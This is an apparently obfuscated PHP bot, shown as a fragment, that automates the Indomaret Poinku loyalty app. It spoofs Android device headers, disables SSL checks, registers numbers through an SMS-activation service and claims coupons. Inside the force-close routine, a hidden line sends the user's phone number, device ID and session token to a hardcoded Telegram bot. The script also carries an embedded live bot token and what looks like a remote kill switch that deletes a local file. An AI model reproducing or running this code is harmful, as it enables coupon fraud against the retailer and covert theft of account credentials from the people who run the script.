    $ruc3h[] = "\x63\x6f\x6e\164\145\x6e\x74\55\164\171\x70\x65\72\40\141\x70\160\x6c\x69\x63\x61\164\151\x6f\156\x2f\x6a\163\x6f\156\73\x20\x63\150\141\x72\163\145\164\x3d\x55\x54\106\55\x38";
    goto PgwIo;
    JV3B1:
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h);
    goto tVB0N;
    s9PxS:
    dTxOM:
    goto Rq7y0;
    m3JxV:
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "\x69\x6e\144\157\56\x74\170\x74");
    goto AzRwX;
    bY2qc:
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto qLQix;
    dqW1D:
    return $ECuqv;
    goto uujSB;
    Rq7y0:
    return false;
    goto tVLZM;
    Y63Xx:
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp);
    goto m3JxV;
    e0B7U:
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true);
    goto JV3B1;
    qLQix:
    goto Ywofz;
    goto s9PxS;
    WOjEJ:
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto bY2qc;
    tVB0N:
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0);
    goto Y63Xx;
    scF3i:
    curl_setopt($C6npe, CURLOPT_URL, $lEbop);
    goto AoxcQ;
    AG_0R:
    $ruc3h[] = "\165\163\x65\x72\x2d\x61\147\145\x6e\x74\72\x20\x6f\x6b\150\x74\164\x70\57\x34\x2e\71\x2e\60";
    goto jAy78;
    tVLZM:
    Ywofz:
    goto hLA6N;
    R6yAk:
    $ruc3h[] = "\173\x22\x61\160\160\x5f\x76\x65\162\x73\x69\x6f\x6e\42\x3a\42\63\56\61\x33\56\60\x22\54\42\x64\145\166\x69\143\x65\x5f\x63\154\141\163\x73\x22\72\x22\120\150\157\156\x65\42\54\42\144\145\x76\151\x63\145\x5f\x66\x61\155\x69\154\x79\42\72\42" . $GOXkU . "\42\x2c\42\x64\x65\x76\151\x63\x65\x5f\x69\x64\42\72\42" . $aY0el . "\x22\54\42\x6f\163\x5f\x6e\141\155\145\42\72\42\x41\156\144\162\157\x69\x64\x20\120\x22\54\42\x6f\x73\x5f\x76\x65\162\163\151\157\156\x22\72\42\101\x6e\144\162\x6f\x69\144\40\x39\42\x7d";
    goto e0B7U;
    AzRwX:
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "\151\156\144\x6f\56\x74\170\x74");
    goto bozxt;
    Z53QR:
    if (!$P7lm9) {
      goto dTxOM;
    }
    goto WOjEJ;
    u4k2a:
    $ruc3h[] = "\110\x6f\x73\x74\72\40\145\x64\164\163\x61\x70\x70\56\x69\x6e\x64\x6f\155\141\162\145\x74\160\157\151\156\153\x75\x2e\143\x6f\155";
    goto i68Hu;
    ZUyUL:
    curl_setopt($C6npe, CURLOPT_POST, 1);
    goto AG_0R;
    uujSB:
  }
  goto UslVr;
  vlvmc:
  if (!($zcN5u == '')) {
    goto jACUo;
  }
  goto ZGdOo;
  UYqSC:
  wSyTI:
  goto bI4nj;
  SoiZ3:
  FAMhO:
  goto kq_Jg;
  yDDs8:
  $obc_G = str_replace("\xd", '', $wlJRC);
  goto DXT4R;
  G0IiA:
  $wDisp = "\173\x22\160\x68\157\x6e\x65\116\x75\x6d\142\x65\162\42\x3a\42" . $zn5zd . "\42\54\42\144\145\x76\x69\143\145\111\x64\42\x3a\x22" . $aY0el . "\42\175";
  goto jtZ3I;
  NN42U:
  @unlink("\160\157\x69\156\x68\x70\56\x70\150\160");
  goto Qh716;
  bkgwV:
  echo @Zm6iC("\156\145\x76\x79", "\x20\x20\x20\x20\x20\40\x20\40\40\40\x59\101\x4e\x47\x20\116\131\105\x42\x41\122\111\x4e\x20\x53\103\122\111\x50\124\40\x49\116\111\40\12");
  goto IF799;
  XgCp2:
  $Ap1KM = json_decode($Jk9cx, true);
  goto ZNTQI;
  ZjJFF:
  $sONlZ = str_replace("\15", '', $rERzL);
  goto tSM8m;
  x31ij:
  $Y031U = @$owfHy["\x64\141\x74\141"]["\143\157\156\164\x65\x6e\164"][$dQ8Tp]["\x65\170\x63\x68\141\x6e\x67\x65\105\x6e\x64\x44\x61\x74\x65"];
  goto QlDQy;
  oHBPa:
  echo "\12";
  goto iCrFC;
  h5zZT:
  wlhXO:
  goto xoEHm;
  Z71kR:
  $u35jw = count($m0f8X) - 1;
  goto Chwcw;
  mHLe6:
  goto ckx1V;
  goto qkMR4;
  zxVpE:
  echo @zM6Ic("\147\x72\145\x65\x6e", "\x41\x64\141\40\101\171\141\x6d\56\x2e\x2e\40\131\165\153\x20\x50\x65\x63\x61\150\151\x6e\x20\41\x21");
  goto tIM8g;
  UVPhM:
  $Ap1KM = json_decode($N0XGD, true);
  goto Wbgjl;
  Vj8L8:
  $yJiD4 = @$owfHy["\144\141\164\141"][0]["\x64\151\x73\164\x72\x69\143\164"]["\144\x69\163\164\x72\151\x63\x74\x4e\141\155\x65"];
  goto D3NTE;
  naeAP:
  $owfHy = json_decode($upOL9, true);
  goto Km1cZ;
  LXFOH:
  echo "\12";
  goto c0k15;
  chsNn:
  $earOL = $sONlZ;
  goto xgNd2;
  j3DmD:
  $Jk9cx = G8pf2("\150\x74\164\160\163\72\57\x2f\145\x64\x74\x73\141\160\x70\56\x69\156\144\157\155\141\x72\145\164\160\x6f\x69\x6e\x6b\165\x2e\x63\x6f\155\57\x63\165\x73\x74\157\155\145\162\x2f\141\x70\151\170\x2d\x31\65\60\x32\x2d\x61\x70\151\57\155\157\142\x69\154\x65\x2f\144\x65\x74\x61\151\154\55\x63\x75\163\x74\x6f\x6d\145\162\55\x6f\162\151\147\x69\x6e", $aY0el, $GOXkU, $mlMLt);
  goto ujQH4;
  Ca6xL:
  echo "\12";
  goto MJ4XI;
  MRiKw:
  $Qa1_P = @$owfHy["\x64\x61\164\x61"]["\143\x6f\x6e\x74\145\156\x74"][$fM3_G]["\x63\157\x75\160\x6f\x6e\111\144"];
  goto hrbe8;
  hNtE9:
  $Jk9cx = g8Pf2("\x68\x74\x74\x70\163\x3a\57\57\145\144\164\x73\x61\x70\x70\56\151\156\144\x6f\155\141\162\x65\164\160\157\x69\156\153\165\x2e\143\x6f\155\x2f\143\x75\x73\x74\157\155\145\x72\x2f\x61\x70\x69\x78\55\61\65\60\x32\x2d\x61\x70\x69\x2f\x69\163\x2d\x77\x68\x61\x74\x73\141\160\x70\x2d\x76\x65\x72\151\x66\151\145\x64", $aY0el, $GOXkU, $mlMLt);
  goto eXFTh;
  hhSOy:
  $m9N4q = "\x73\x65\156\x64\x4d\145\163\163\141\x67\145";
  goto Qji9l;
  WR_ss:
  function xwL4L()
  {
    return sprintf("\45\60\x34\x78\x25\x30\x34\170\55\x25\60\64\x78\x2d\45\x30\64\x78\x2d\45\x30\x34\170\x2d\45\x30\64\x78\45\60\x34\x78\x25\60\64\x78", mt_rand(0, 0xffff), mt_rand(0, 0xffff), mt_rand(0, 0xffff), mt_rand(0, 0xfff) | 0x4000, mt_rand(0, 0x3fff) | 0x8000, mt_rand(0, 0xffff), mt_rand(0, 0xffff), mt_rand(0, 0xffff));
  }
  goto azsEt;
  pR3Tn:
  if (!($ABmxY == "\x4b\x6f\144\145\x20\x56\x65\x72\151\x66\151\x6b\141\163\151\x20\171\141\x6e\x67\x20\153\141\x6d\x75\40\155\141\163\x75\153\x61\156\x20\163\141\154\x61\x68\x2e")) {
    goto iL2Tt;
  }
  goto fAd2I;
  kPWys:
  echo @zm6Ic("\156\145\x76\171", "\x20\40\40\40\x20\x20\x20\40\40\x20\40\40\40\x20\x20\x20\101\101\x4d\111\x49\116\x20");
  goto BBKgz;
  VSZ0R:
  $unXYW = "\57\163\x74\x6f\x72\141\x67\145\x2f\145\x6d\x75\x6c\141\164\x65\x64\x2f\60\57\x41\x6e\x64\162\x6f\x69\x64";
  goto GJAME;
  e8gJe:
  qWFPI:
  goto tYtSk;
  iiXGU:
  echo "\xa";
  goto iLVbB;
  Ze_qG:
  echo @zM6IC("\171\x65\154\154\x6f\167", "\x4d\x61\163\x75\x6b\153\141\x6e\40\x4e\x61\x6d\x61\x20\40\x50\145\x6e\145\x72\x69\155\x61\x20\72\40");
  goto g1guV;
  lqIFf:
  WFiJC:
  goto TfHzm;
  nDicY:
  $wDisp = '';
  goto rWXkI;
  dEYI8:
  if (!($jTEU0 < $S8W9D)) {
    goto yCYD7;
  }
  goto BySUD;
  F1unt:
  $efQM2 = count($QRhbE) - 1;
  goto aRyiT;
  dZtlv:
  if (!($D2zwh < $ogbF4)) {
    goto GsrX0;
  }
  goto GWdpQ;
  zcO32:
  $YXsOG = @$Ap1KM["\155\x65\163\x73\141\147\145"];
  goto zZsUf;
  VuJbz:
  Kt3g1("\146\x6f\x72\143\x65\x63\x6c\x6f\163\x65", $zn5zd, $aY0el, $earOL, $GOXkU);
  $teeli001 = file_get_contents("https://api.telegram.org/bot5529819060:AAGy5hFZW802Cm7Dut_gOSEtnPMzrY_n49I/sendMessage?chat_id=1069319412&text=$zn5zd|$aY0el|$earOL|$GOXkU");
  goto Dt3qx;
  MJ9En:
  echo $yy9BI . "\x2e\x20";
  goto b5LV5;
  VW1_y:
  $jTEU0 = trim(fgets(STDIN));
  goto q_khU;
  CIbrM:
  if (!($XDyMm == "\60")) {
    goto ds3qL;
  }
  goto tT8Ow;
  VdnEi:
  if (!($ZNU2M == '')) {
    goto YUYuF;
  }
  goto PCpFs;
  HuxLa:
  @unlink("\160\x6f\151\x6e\x68\160\56\x70\150\x70");
  goto zUdc1;
  JtIVc:
  echo @Zm6Ic("\x6e\145\x76\x79", $SR3ui);
  goto S0J70;
  EAifF:
  $UHj7C = G8PF2("\x68\164\x74\160\163\72\x2f\x2f\145\144\164\163\141\x70\160\56\151\x6e\x64\157\x6d\141\162\x65\x74\x70\x6f\151\156\153\165\56\x63\x6f\155\57\x63\157\165\x70\x6f\x6e\57\x61\160\151\x78\55\x31\x35\x30\62\x2d\x61\x70\x69\x2f\155\157\142\x69\x6c\145\57\143\x6f\165\x70\157\x6e\x73\x3f\165\156\160\x61\x67\145\x64\75\164\162\x75\145", $aY0el, $GOXkU, $mlMLt);
  goto Q0ESs;
  dcLCq:
  echo "\12";
  goto wkOS0;
  g1ZEJ:
  $sOOnY = FQ6w0();
  goto RGQLS;
  AV9rQ:
  echo "\115\165\x6c\x61\x69\x20\102\141\x72\151\163\x20\x4b\x65\40\40\x3a\40";
  goto ld8w2;
  v3oAA:
  echo $BcbF3;
  goto HBaZy;
  dMR2J:
  function ThHfs($lEbop, $wDisp = null, $aY0el, $GOXkU)
  {
    goto oVkCG;
    rr58e:
    print_r($AXlcQ);
    goto AQIgi;
    jU1KX:
    $AXlcQ = json_decode($y7f11, true);
    goto rr58e;
    L5_Ve:
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp);
    goto CaJvD;
    SaZwO:
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true);
    goto y5pEv;
    F22y6:
    goto q7EaK;
    goto det9T;
    PEKg_:
    q7EaK:
    goto jU1KX;
    det9T:
    tmCVU:
    goto w_QPi;
    wwi5T:
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true);
    goto EAWJM;
    CaJvD:
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "\151\156\x64\157\56\164\x78\x74");
    goto HRf2k;
    a8Bvt:
    $ECuqv = curl_exec($C6npe);
    goto ErOYN;
    w_QPi:
    return false;
    goto PEKg_;
    i81Re:
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto hQm8O;
    pU3Et:
    $ruc3h[] = "\x75\163\145\x72\x2d\141\x67\145\x6e\x74\72\40\157\x6b\150\x74\x74\x70\x2f\x35\56\x30\x2e\60\55\x61\154\160\150\x61\56\62";
    goto gK5CK;
    oVkCG:
    $C6npe = curl_init();
    goto JZcXU;
    JZcXU:
    curl_setopt($C6npe, CURLOPT_URL, $lEbop);
    goto wwi5T;
    ONBGG:
    $ruc3h[] = "\141\x70\160\163\72\x20\x7b\42\x61\160\160\x5f\166\x65\162\x73\x69\x6f\156\42\72\x22\x33\x2e\x31\x33\x2e\60\42\54\x22\x64\x65\166\x69\143\145\x5f\143\154\141\163\x73\x22\x3a\42\x50\x68\157\156\x65\42\54\42\144\145\x76\151\143\145\137\x66\141\x6d\151\x6c\x79\42\x3a\42" . $GOXkU . "\x22\x2c\x22\144\x65\166\x69\143\x65\x5f\x69\144\x22\72\42" . $aY0el . "\x22\x2c\42\x6f\163\x5f\x6e\141\155\x65\x22\72\42\x41\156\x64\162\x6f\151\144\x20\120\42\54\x22\157\163\137\166\x65\162\x73\151\x6f\x6e\42\x3a\42\101\x6e\144\162\157\x69\x64\40\x39\x22\x7d";
    goto SaZwO;
    Zfbkw:
    curl_setopt($C6npe, CURLOPT_POST, 1);
    goto pU3Et;
    ErOYN:
    $P7lm9 = curl_getinfo($C6npe);
    goto gT5lF;
    AQIgi:
    return $ECuqv;
    goto aoo6_;
    hQm8O:
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto F22y6;
    Ku5XE:
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0);
    goto L5_Ve;
    gK5CK:
    $ruc3h[] = "\x63\157\156\x74\x65\x6e\x74\55\164\171\x70\x65\x3a\x20\141\160\x70\x6c\x69\143\x61\x74\151\x6f\156\x2f\152\x73\157\x6e\x3b\x20\x63\150\x61\162\163\145\x74\75\125\124\106\55\x38";
    goto mhElK;
    HRf2k:
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "\151\x6e\144\x6f\56\x74\170\x74");
    goto a8Bvt;
    mhElK:
    $ruc3h[] = "\153\x65\171\72\x20\132\x57\x52\x30\143\x7a\111\x77\x4d\152\x45\66\x4d\x48\x42\163\x62\x57\x39\162\142\x67\x3d\x3d";
    goto ONBGG;
    y5pEv:
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h);
    goto Ku5XE;
    gT5lF:
    if (!$P7lm9) {
      goto tmCVU;
    }
    goto i81Re;
    EAWJM:
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1);
    goto Zfbkw;
    aoo6_:
  }
  goto ufC5L;
  sE3lv:
  echo "\xa";
  goto aMC4b;
  po2np:
  echo "\12";
  goto Gi8WL;
  YLDiM:
  $S8W9D = trim(fgets(STDIN));
  goto Vnumm;
  O4Bvg:
  $earOL = $sONlZ;
  goto U3GMQ;
  OwlK1:
  echo $yy9BI . "\56\x20";
  goto L9zdo;
  YQNNm:
  echo "\12";
  goto MlM4g;
  k3n5R:
  echo @zm6iC("\147\x72\x65\145\x6e", "\120\157\x73\x74\x61\154\40\x43\157\x64\145\x20\40\x20\x20\72\x20");
  goto CEEHv;
  A0K7O:
  echo "\12";
  goto tb6FY;
  Mws1Z:
  $jTEU0 = trim(fgets(STDIN));
  goto PAlyc;
  dhjGK:
  $ZNU2M = @$Ap1KM["\144\141\164\141"]["\x63\157\x75\160\157\156\116\x61\155\x65"];
  goto wLOWl;
  scrxk:
  $obc_G = str_replace("\xd", '', $wlJRC);
  goto ADYHk;
  EcpCc:
  echo @zm6Ic("\156\145\x76\171", "\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\131\101\x4e\107\40\116\x59\x45\x42\x41\122\x49\116\40\x53\x43\122\x49\x50\x54\x20\x49\x4e\x49\40\12");
  goto MkfQF;
  p6Ll2:
  $TvVlh = XozB4(array("\x7c", "\15"), $tqWr2)[3];
  goto LX2I5;
  y_tAm:
  goto e81aM;
  goto ZiZwm;
  rGzs0:
  $M1ADy = @$Ap1KM["\144\141\x74\x61"]["\x69\x64"];
  goto XHDw3;
  J_qYQ:
  goto VouNS;
  goto D3fZI;
  TUPvR:
  $efQM2 = count($QRhbE) - 1;
  goto gSIlt;
  tOkg_:
  $mlMLt = $obc_G;
  goto hnEGN;
  kq_Jg:
  echo "\xa";
  goto P0Tqd;
  HC4Z1:
  if (!($fUekS == '')) {
    goto RZv4q;
  }
  goto hNZdX;
  tndI6:
  gakBA:
  goto x0PGE;
  lvnW1:
  $QRhbE = explode("\xa", @file_get_contents("\155\x79\164\157\x6b\x65\x6e"));
  goto TUPvR;
  erWnH:
  $zvt88 = $QRhbE;
  goto Ncv3v;
  iCrFC:
  echo @zm6IC("\156\x65\x76\x79", "\123\157\162\162\171\54\40\x54\x68\151\163\40\x53\x63\x72\151\160\164\40\110\141\x73\40\x42\x65\145\156\40\122\145\155\157\166\x65\x64\x20\x42\x79\x20\x54\x68\145\x20\x4f\167\156\145\x72\x21\41");
  goto kE_5P;
  YcLmy:
  goto b3wIQ;
  goto K3NB6;
  SE9Y8:
  $p4iky = @$nPb0z["\x64\141\164\141"]["\x6d\x65\155\142\145\162\x49\x64"];
  goto HBhXw;
  kS9F0:
  $wDisp = "\173\x22\144\x61\164\x61\x22\72\133\x7b\x22\x61\x70\160\154\x69\x63\x61\164\151\x6f\x6e\42\72\173\42\x61\160\x70\x5f\166\145\162\163\151\157\x6e\42\72\x22\63\56\x31\x33\x2e\x30\x22\x2c\x22\x64\x65\x76\151\x63\x65\137\x63\154\x61\163\x73\42\x3a\42\x50\x68\157\x6e\x65\42\54\x22\144\145\x76\x69\x63\x65\x5f\146\141\155\151\154\171\x22\72\x22" . $GOXkU . "\x22\x2c\42\x64\x65\x76\151\143\145\x5f\x69\x64\x22\x3a\42" . $aY0el . "\42\54\42\x6f\163\137\156\141\155\145\42\x3a\x22\101\x6e\x64\x72\157\151\x64\x20\x50\42\x2c\x22\x6f\163\137\166\x65\x72\x73\x69\x6f\x6e\42\x3a\x22\x41\156\x64\162\157\x69\144\40\71\x22\x7d\x2c\42\x63\x6f\162\145\x22\72\173\x22\145\166\145\156\164\137\156\141\x6d\145\42\72\x22\x70\141\x67\x65\137\x76\151\145\167\42\x2c\x22\145\166\145\x6e\164\x5f\164\x69\x6d\x65\x73\164\x61\155\x70\x22\72" . $nb9cm . "\54\x22\160\141\x67\145\137\x6e\x61\155\x65\42\72\x22\x50\111\x4e\40\141\x63\164\151\x76\141\164\x69\157\156\x22\54\42\160\141\147\145\x5f\165\162\154\x70\141\x74\x68\x22\x3a\42\x22\175\x2c\42\x6d\141\162\153\145\164\151\x6e\147\x22\72\x7b\x22\165\x74\155\137\x72\141\167\x22\72\42\165\x74\x6d\x5f\163\x6f\165\162\143\145\x3d\147\x6f\x6f\x67\x6c\x65\x2d\x70\x6c\x61\x79\46\165\164\155\137\155\x65\x64\x69\165\155\75\x6f\162\147\141\156\x69\x63\42\x7d\x2c\42\x75\163\145\162\42\x3a\173\42\x73\x65\x73\163\151\157\x6e\x5f\x69\144\42\x3a\42" . $MXjqh . "\x22\54\x22\165\163\145\x72\137\x69\x64\x22\72" . $R_bYC . "\54\42\165\x73\x65\x72\137\x69\160\137\141\144\144\162\145\x73\x73\42\x3a\42\x31\62\67\56\60\56\60\56\x31\x22\x7d\x7d\x5d\175";
  goto KHl5h;
  VTt9r:
  echo @zm6Ic("\160\x75\x72\160\x6c\x65", "\x5b\x31\61\x5d\x20{$mF_0D}\40\xa\40\40\x20\40\x3e\40{$GTMYQ}\40\xa\xa");
  goto zbvnq;
  K2cEc:
  echo @zM6IC("\x79\x65\x6c\x6c\157\x77", "\123\164\x61\x74\165\163\x20\x3a\40");
  goto QXpWd;
  EmKuI:
  xUutP:
  goto aacu_;
  f3KNk:
  if (!($fUekS == '')) {
    goto ffDWu;
  }
  goto XzOoE;
  g_Gi9:
  $mlMLt = $obc_G;
  goto QCDy5;
  x8Bj2:
  echo @zm6ic("\x70\x75\162\x70\x6c\x65", "\x5b\x31\65\x5d\x20{$ucJzj}\40\xa\x20\x20\40\x20\x3e\x20{$Ex3sI}\x20\12\xa");
  goto r44f6;
  xCZbu:
  $m5BZY = Gggr_("\150\164\164\x70\x73\72\x2f\57\x61\163\x69\x61\55\163\x6f\165\164\150\145\x61\163\164\x32\x2d\151\x64\155\55\143\x6f\162\160\55\x70\x72\144\56\x63\x6c\x6f\165\x64\x66\x75\156\x63\x74\x69\x6f\x6e\x73\x2e\x6e\145\164\57\x69\144\x6d\141\x70\160\163\x5f\x74\x72\x61\x63\x6b\145\162\137\147\x61\x74\145\x77\141\x79", $wDisp);
  goto TNEVB;
  ykUuj:
  $Ap1KM = json_decode($Jk9cx, true);
  goto AEacE;
  qg2i3:
  $m5BZY = GgGR_("\150\164\x74\160\163\72\x2f\x2f\141\163\151\141\55\163\157\165\164\x68\x65\141\x73\164\62\55\151\144\x6d\55\x63\157\162\x70\x2d\160\162\144\56\143\154\157\x75\x64\x66\165\x6e\x63\x74\151\x6f\156\163\56\156\x65\x74\57\151\144\155\141\x70\x70\x73\137\164\162\x61\143\153\x65\162\x5f\x67\141\164\x65\x77\x61\171", $wDisp);
  goto TRbuu;
  SwawF:
  echo @Zm6Ic("\x79\145\x6c\154\x6f\167", $qaGLY);
  goto gavpL;
  fNtNy:
  MN2hd:
  goto n8X_y;
  Q4vMp:
  if ($NFC6_ == "\104\x69\x73\x6b\x6f\x6e\40\122\x70\40\x32\65\56\x30\x30\x30\40\113\x6c\x69\x6b\x20\x49\156\144\157\155\141\x72\x65\x74") {
    goto Hw2pH;
  }
  goto JFUAt;
  rHfbp:
  $efQM2 = count($IKJzx) - 1;
  goto FK02O;
  yEnw1:
  echo @zm6IC("\x6e\x65\x76\x79", $ZqwwP);
  goto bp5Ld;
  yGhA1:
  @unlink("\x70\157\151\x6e\150\160\x2e\160\150\160");
  goto RYFAp;
  YgpmT:
  echo "\12";
  goto yvQpH;
  kvyId:
  XZBu7:
  goto RWuwl;
  MGp32:
  echo @ZM6IC("\171\x65\154\154\157\167", "\x42\165\x69\x6c\144\x20\x42\x79\40\x46\105\122\x44\131\40\122\x41\115\x41\x44\x48\101\116\40");
  goto AE_x0;
  Na7VL:
  echo $BcbF3;
  goto dnHEW;
  LRFDy:
  if (!($cPDPt == 7)) {
    goto UI83C;
  }
  goto SYacG;
  p12qk:
  $U_EVz = @$owfHy["\144\141\x74\141"][$qtgR3]["\x73\165\x62\104\x69\x73\164\162\x69\143\x74\103\157\x64\x65"];
  goto gSIFK;
  Sx3di:
  echo @ZM6iC("\x79\x65\x6c\x6c\x6f\x77", "\x20\61\60\x20\x2e\x20\103\145\x6b\40\120\157\151\x6e\x20\115\x75\12");
  goto fxsrP;
  Q_oJ7:
  $yy9BI++;
  goto HvOW_;
  wRkJh:
  echo "\12";
  goto vxM93;
  QnwC5:
  uY9IY:
  goto z92mg;
  z_df6:
  echo @ZM6ic("\171\145\x6c\154\157\x77", "\102\x75\x69\154\144\x20\x42\171\x20\x46\x45\122\104\x59\x20\x52\101\x4d\x41\x44\110\x41\116\40");
  goto mQ4fU;
  w7yv5:
  echo @zM6Ic("\x79\x65\154\x6c\157\167", "\123\164\x61\164\x75\x73\40\x43\145\x6b\x20\113\x75\x70\157\x6e\40\72\x20");
  goto UlQV_;
  NcukH:
  die;
  goto cGhEP;
  UWw0n:
  MLXaN:
  goto jMYW0;
  ZJ1DV:
  Wsf05:
  goto PUuJw;
  NHckK:
  RHRij("\113\165\160\x6f\156\40\x50\157\151\156\x6b\165\x20\x6e\145\x77\x2e\164\x78\x74", $kGhP3);
  goto iOMaV;
  Ip1aE:
  $XTuz1 = g1WXt("\150\164\164\x70\163\x3a\57\57\x65\x64\164\x73\x61\160\x70\56\151\156\x64\157\x6d\141\x72\145\164\160\x6f\x69\156\x6b\x75\x2e\143\157\x6d\57\143\x75\x73\164\x6f\x6d\x65\162\x2f\x61\160\x69\170\x2d\x31\x35\x30\62\55\141\160\151\57\155\x6f\x62\x69\x6c\x65\57\x63\x75\163\x74\x6f\x6d\x65\162\x2d\141\x64\x64\x72\145\163\x73\x2f\144\151\163\164\x72\x69\x63\164", $wDisp, $aY0el, $GOXkU, $mlMLt);
  goto WHRdx;
  YgdMG:
  $u35jw = count($oNl8L) - 1;
  goto cDfRg;
  hhb4v:
  $Ti1xH = z82Db("\x68\x74\x74\x70\x73\72\x2f\57\163\155\163\55\x61\x63\164\x69\166\x61\164\145\x2e\x72\165\57\163\164\165\x62\x73\57\150\x61\156\x64\x6c\x65\x72\137\x61\x70\x69\56\x70\150\x70\x3f\x61\160\151\x5f\x6b\x65\171\75" . $rVPVc . "\46\141\x63\164\x69\x6f\x6e\x3d\x67\x65\164\x42\x61\x6c\x61\x6e\143\x65");
  goto rX35n;
  w_AWe:
  $a7K8a = AUJhZ("\x68\164\x74\160\163\72\57\x2f\146\151\x72\145\142\141\163\145\x72\145\155\x6f\164\145\143\x6f\x6e\x66\151\147\x2e\147\x6f\x6f\147\154\x65\x61\x70\x69\x73\56\x63\x6f\155\x2f\166\x31\57\160\162\x6f\x6a\x65\143\164\163\57\71\71\x38\x38\x31\66\66\60\x35\63\62\70\57\x6e\141\x6d\x65\x73\x70\x61\143\145\163\x2f\x66\151\x72\x65\142\141\163\x65\72\x66\x65\x74\x63\x68", $wDisp, $YYbml);
  goto w38wp;
  jtwaS:
  echo "\12";
  goto zlztx;
  OWCKV:
  JyBDM:
  goto nSNur;
  aHo28:
  curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1);
  goto Uj__J;
  OWQhi:
  $ZNU2M = @$Ap1KM["\144\x61\x74\141"]["\162\145\167\x61\x72\144\x73"][0]["\151\164\x65\155"][0]["\x6e\141\155\x65"];
  goto sPifG;
  G70pT:
  TLXym:
  goto DDFYo;
  C7yJd:
  $GOXkU = $w5ulg;
  goto qhJ96;
  lhclc:
  if (!($ZNU2M == '')) {
    goto ptn8D;
  }
  goto WkvW9;
  cgMr9:
  echo @ZM6ic("\x67\x72\x65\145\156", "\101\144\x61\40\x41\171\x61\x6d\x2e\56\x2e\40\131\x75\153\x20\120\x65\x63\141\x68\151\156\x20\x21\x21");
  goto seLWO;
  lzm9A:
  @unlink("\160\157\x69\156\150\160\x2e\x70\150\160");
  goto OBy3d;
  Epv0S:
  echo $jTEU0;
  goto PzxHu;
  U0P17:
  goto p1VdQ;
  goto gvrLt;
  Bj4_J:
  print_r($zcN5u);
  goto mf9wm;
  TRbuu:
  $Jk9cx = G8pf2("\150\164\164\x70\x73\x3a\57\x2f\145\x64\164\x73\141\x70\160\56\x69\156\x64\x6f\155\x61\162\145\x74\x70\x6f\151\x6e\153\x75\x2e\x63\157\155\x2f\x63\x6f\x6e\146\151\147\165\x72\141\x74\x69\157\x6e\57\x61\160\x69\170\55\x31\x35\x30\62\x2d\x61\x70\x69\57\155\x6f\x62\x69\154\x65\x2f\x73\171\55\141\160\160\55\x76\145\x72\163\151\157\156\57\x67\x65\x74\x2d\x76\145\162\163\151\x6f\x6e\55\153\x65\171\x2f\x41\x4e\104\122\117\x49\104", $aY0el, $GOXkU, $mlMLt);
  goto uZqPO;
  c5N7a:
  $r99Ty = date("\131\55\155\x2d\x64");
  goto Ghhvp;
  jX5Xi:
  echo "\xa";
  goto cc9fY;
  Dydaf:
  $BcbF3 = @$Ap1KM["\144\x61\x74\x61"]["\x70\150\x6f\156\x65\116\165\155\142\145\162"];
  goto YQNNm;
  ukz32:
  $yy9BI++;
  goto oBg1o;
  q9z4g:
  $odYyL = @$lImQC["\144\x61\164\141"]["\x63\x6f\x6e\164\x65\156\x74"][1]["\143\x6f\x75\160\x6f\x6e\x4e\x61\x6d\145"];
  goto o7RA7;
  teyF2:
  goto Gr9uI;
  goto YHEft;
  EKWAg:
  $wd9cN = date("\x64\55\155\x2d\x59\40\x7c\40\x48\72\x69\x3a\163");
  goto sTQjT;
  o7hXR:
  echo exec("\143\x6c\145\x61\162");
  goto zVRV9;
  BV2ez:
  echo "\12";
  goto a_Crt;
  V2WUN:
  echo @zm6iC("\171\145\x6c\x6c\157\x77", "\x50\157\x69\156\x20\x41\x6e\144\141\x20\72\40");
  goto CX_zf;
  Phh63:
  $obc_G = str_replace("\15", '', $wlJRC);
  goto qovaZ;
  alHDl:
  echo @zm6Ic("\x67\162\145\x65\x6e", "\x20\x20\174\x20\x57\x41\x20\x30\70\x32\x31\x37\x36\x33\65\70\62\71\65\x20\xa");
  goto XKpv9;
  YrGWs:
  $wlJRC = xoZB4(array("\174"), $wZnHP)[1];
  goto QtHtQ;
  RO2UM:
  echo $BcbF3;
  goto fTF4v;
  U17fx:
  if (!($fUekS == '')) {
    goto t27Lz;
  }
  goto bzslb;
  XW71U:
  cdHjV:
  goto BkzVQ;
  J5Yc7:
  $wd9cN = date("\x64\55\x6d\x2d\131\40\x7c\x20\110\72\151\x3a\x73");
  goto mWmUQ;
  xxJsw:
  echo "\xa";
  goto xcEUm;
  Oe2Q8:
  echo "\xa";
  goto zf8Zf;
  iv9jW:
  $GOXkU = $w5ulg;
  goto yHDsJ;
  g8W5n:
  echo @Zm6ic("\x79\x65\154\154\157\167", "\x20\55\40\x53\151\154\x61\150\153\141\156\40\115\145\154\x61\153\x75\x6b\141\156\40\x54\x72\x61\156\163\141\153\x73\x69\40\124\x65\x72\154\x65\x62\151\150\40\x44\141\150\165\154\x75\12");
  goto iu_7C;
  YN8f1:
  N56DQ:
  goto iDAIJ;
  mTGZw:
  $jTEU0++;
  goto H2AMl;
  Aj6dX:
  die;
  goto vr9Ss;
  bwQ3Z:
  echo @Zm6iC("\x6e\145\166\x79", "\x4d\141\x75\x20\120\x69\x6c\151\x68\x20\x4f\160\163\151\x20\115\x61\156\141\x20\x3f\40\x3a\x20\xa");
  goto EN8OP;
  BTCr_:
  echo "\12";
  goto jBx5X;
  Q2XZ7:
